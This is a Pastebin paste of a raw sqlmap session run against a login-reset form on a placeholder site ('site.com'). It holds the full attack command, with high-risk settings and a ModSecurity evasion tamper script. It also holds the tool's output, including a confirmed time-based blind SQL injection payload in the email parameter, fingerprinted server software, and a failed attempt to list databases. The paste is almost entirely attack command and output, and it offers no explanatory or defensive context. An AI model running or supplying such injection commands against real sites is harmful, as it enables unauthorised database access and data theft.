Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- > sqlmap -u https://site.com/forget_password --data="authenticity_token=CapTbk8wgJtYrsVrLH81X6oGOt43E0oC5El4Ltvu3E3TmQNOwje6ZgmWxDj61XdeyEiCerRlXgJnok2dSCeWSg%3D%3D&commit=Reset%20my%20password&email=*&utf8=%E2%9C%93" --level=5 --risk=3 --random-agent --batch --dbs --tamper=modsecurityversioned --fresh-queries
- ___
- __H__
- ___ ___[)]_____ ___ ___ {1.2.12.14#dev}
- |_ -| . [(] | .'| . |
- |___|_ [,]_|_|_|__,| _|
- |_|V |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting @ 12:22:47 /2018-12-13/
- [12:22:47] [INFO] loading tamper module 'modsecurityversioned'
- [12:22:47] [WARNING] tamper script 'modsecurityversioned' is only meant to be run against MySQL
- [12:22:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9' from file 'C:\PentestBox\bin\WebApplications\sqlmap\txt\user-agents.txt'
- custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
- [12:22:48] [INFO] resuming back-end DBMS 'mysql'
- [12:22:48] [INFO] testing connection to the target URL
- [12:22:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: #1* ((custom) POST)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: authenticity_token=CapTbk8wgJtYrsVrLH81X6oGOt43E0oC5El4Ltvu3E3TmQNOwje6ZgmWxDj61XdeyEiCerRlXgJnok2dSCeWSg==&commit=Reset my password&email='||(SELECT 0x55774146 WHERE 7124=7124 AND SLEEP(5))||'&utf8=%E2%9C%93
- ---
- [12:22:50] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
- [12:22:50] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.3.3, Nginx 1.10.2
- back-end DBMS: MySQL >= 5.0.12
- [12:22:50] [INFO] fetching database names
- [12:22:50] [INFO] fetching number of databases
- [12:22:50] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
- do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
- [12:23:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
- 4
- [12:23:03] [INFO] retrieved:
- [12:23:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
- [12:23:04] [INFO] retrieved:
- [12:23:05] [INFO] retrieved:
- [12:23:06] [INFO] retrieved:
- [12:23:07] [INFO] falling back to current database
- [12:23:07] [INFO] fetching current database
- [12:23:07] [INFO] retrieved:
- [12:23:08] [CRITICAL] unable to retrieve the database names
- [*] ending @ 12:23:08 /2018-12-13/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement